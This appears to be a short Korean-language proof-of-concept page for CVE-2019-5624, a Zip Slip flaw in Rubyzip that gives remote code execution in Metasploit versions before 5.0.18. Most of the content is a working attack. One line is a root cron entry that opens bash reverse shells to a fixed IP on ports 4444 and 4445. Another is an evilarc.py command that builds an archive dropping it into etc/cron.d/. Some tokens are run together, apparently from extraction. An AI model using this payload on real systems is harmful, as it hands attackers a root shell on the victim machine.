
Metasploit의 CVE-2019-5624 취약점(Rubyzip 안전하지 않은 ZIP 처리 RCE)에 대한 개념 증명
Metasploit의 CVE-2019-5624 취약점(Rubyzip의 안전하지 않은 ZIP 처리로 인한 RCE)에 대한 개념 증명
2019년 2월, Rubyzip 라이브러리에서 새로운 취약점을 발견했습니다. 이 취약점으로 인해 공격자는 안전하지 않은 ZIP 처리를 (Zip Slip) 악용하여 원격 코드 실행이 가능합니다.
이 취약점은 모든 Metasploit 버전 < 5.0.18을 대상으로 활용되었습니다. Metasploit Wrap-Up
취약점을 설명하는 상세한 블로그 포스트를 작성했습니다.
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
python evilarc.py exploit --os unix -p etc/cron.d/